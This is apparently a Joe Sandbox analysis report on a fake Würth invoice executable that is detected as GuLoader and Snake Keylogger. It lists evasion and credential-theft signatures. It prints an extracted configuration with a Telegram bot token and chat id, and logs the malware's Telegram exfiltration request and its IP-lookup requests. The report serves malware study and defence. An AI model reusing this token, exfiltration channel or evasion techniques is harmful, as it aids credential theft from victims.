Windows Analysis Report
Wuerth_factura_4052073226..exe

Overview

General Information

Sample name:	Wuerth_factura_4052073226..exe
Analysis ID:	1537095
MD5:	787041cd8d6cd5e63534d1b060889a76
SHA1:	82da83771130fbe29d2443635757c3cf5c3949c6
SHA256:	4447fbf1066bc4f640abff84fcac04d0c86664f9823410348a36c280ac80e26d
Tags:	exe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Machine Learning detection for sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7777204705:AAGdGJgXaEaWvE6yXv7RvWYjJkTQCsiDnJc", "Chat_id": "7698865320", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Wuerth_factura_4052073226..exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Wuerth_factura_4052073226..exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F87A8 CryptUnprotectData,		4_2_3A5F87A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F8EF1 CryptUnprotectData,		4_2_3A5F8EF1

Uses 32bit PE files

Source: Wuerth_factura_4052073226..exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49980 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2

Source: Wuerth_factura_4052073226..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,	0_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_00406370 FindFirstFileW,FindClose,	4_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_0040581E DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DF45Dh	4_2_000DF2C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DF45Dh	4_2_000DF4AC
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DF45Dh	4_2_000DF52F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DFC19h	4_2_000DF974
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB31E0h	4_2_39DB2DC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB2C19h	4_2_39DB2968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB31E0h	4_2_39DB2DB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBDC51h	4_2_39DBD9A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBD7F9h	4_2_39DBD550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB31E0h	4_2_39DB310E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBD3A1h	4_2_39DBD0F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBCF49h	4_2_39DBCCA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39DB0853
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39DB0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBFAB9h	4_2_39DBF810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBF661h	4_2_39DBF3B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBF209h	4_2_39DBEF60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBEDB1h	4_2_39DBEB08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB0D0Dh	4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB1697h	4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBE959h	4_2_39DBE6B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBE501h	4_2_39DBE258
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39DB0673
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBE0A9h	4_2_39DBDE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F5179h	4_2_3A5F4ED0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F7EB5h	4_2_3A5F7B78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F9280h	4_2_3A5F8FB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F1CF9h	4_2_3A5F1A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FD146h	4_2_3A5FCE78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F4D21h	4_2_3A5F4A78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F7119h	4_2_3A5F6E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FF136h	4_2_3A5FEE68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F6CC1h	4_2_3A5F6A18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F48C9h	4_2_3A5F4620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F7571h	4_2_3A5F72C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FF5C6h	4_2_3A5FF2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F2151h	4_2_3A5F1EA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F2A01h	4_2_3A5F2758
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FB5E6h	4_2_3A5FB318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FD5D6h	4_2_3A5FD308
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F25A9h	4_2_3A5F2300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F55D1h	4_2_3A5F5328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F79C9h	4_2_3A5F7720
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F5E81h	4_2_3A5F5BD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FDA66h	4_2_3A5FD798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FFA56h	4_2_3A5FF788
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F5A29h	4_2_3A5F5780
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F2E59h	4_2_3A5F2BB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FBA76h	4_2_3A5FB7A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F02E9h	4_2_3A5F0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F3709h	4_2_3A5F3460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F32B1h	4_2_3A5F3008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FBF06h	4_2_3A5FBC38
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F62D9h	4_2_3A5F6030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FDEF6h	4_2_3A5FDC28
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FC396h	4_2_3A5FC0C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F0B99h	4_2_3A5F08F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F0741h	4_2_3A5F0498
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F6733h	4_2_3A5F6488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov esp, ebp	4_2_3A5FB081
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FE386h	4_2_3A5FE0B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FC826h	4_2_3A5FC558
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FE816h	4_2_3A5FE548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F0FF1h	4_2_3A5F0D48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FECA6h	4_2_3A5FE9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F18A1h	4_2_3A5F15F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FCCB6h	4_2_3A5FC9E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F1449h	4_2_3A5F11A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A666970h	4_2_3A666678
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A666347h	4_2_3A665FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66A2D0h	4_2_3A669FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A660C2Eh	4_2_3A660960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668158h	4_2_3A667E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66AC60h	4_2_3A66A968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66D768h	4_2_3A66D470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A664746h	4_2_3A664478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66030Eh	4_2_3A660040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A666E38h	4_2_3A666B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A665E16h	4_2_3A665B48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A669940h	4_2_3A669648
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66C448h	4_2_3A66C150
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663E26h	4_2_3A663B58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66EF50h	4_2_3A66EC58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66F418h	4_2_3A66F120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6654F6h	4_2_3A665228
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668620h	4_2_3A668328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66B128h	4_2_3A66AE30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663506h	4_2_3A663238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66DC30h	4_2_3A66D938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66E0F8h	4_2_3A66DE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A664BD7h	4_2_3A664908
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A667300h	4_2_3A667008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6619DEh	4_2_3A661710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A669E08h	4_2_3A669B10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A662BE6h	4_2_3A662918
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66C910h	4_2_3A66C618
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66CDD8h	4_2_3A66CAE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6642B6h	4_2_3A663FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66F8E0h	4_2_3A66F5E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6610BEh	4_2_3A660DF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668AE8h	4_2_3A6687F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6622C6h	4_2_3A661FF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66B5F0h	4_2_3A66B2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66BAB8h	4_2_3A66B7C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663996h	4_2_3A6636C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66E5C0h	4_2_3A66E2C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66079Eh	4_2_3A6604D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6677C8h	4_2_3A6674D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A661E47h	4_2_3A661BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66A798h	4_2_3A66A4A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663076h	4_2_3A662DA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66D2A0h	4_2_3A66CFA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66FDA8h	4_2_3A66FAB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A665986h	4_2_3A6656B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668FB0h	4_2_3A668CB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66154Eh	4_2_3A661280
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A669478h	4_2_3A669180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A662756h	4_2_3A662488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66BF80h	4_2_3A66BC88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66EA88h	4_2_3A66E790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A665066h	4_2_3A664D98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A667C90h	4_2_3A667998
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691FE8h	4_2_3A691CF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A690338h	4_2_3A690040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691B20h	4_2_3A691828
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691190h	4_2_3A690E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691658h	4_2_3A691360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A690801h	4_2_3A690508
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A690CC8h	4_2_3A6909D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A813E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A813E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A810A10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A8108DE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A810960

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2019/10/2024%20/%2007:08:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49982 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49981 -> 188.114.96.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49980 version: TLS 1.0

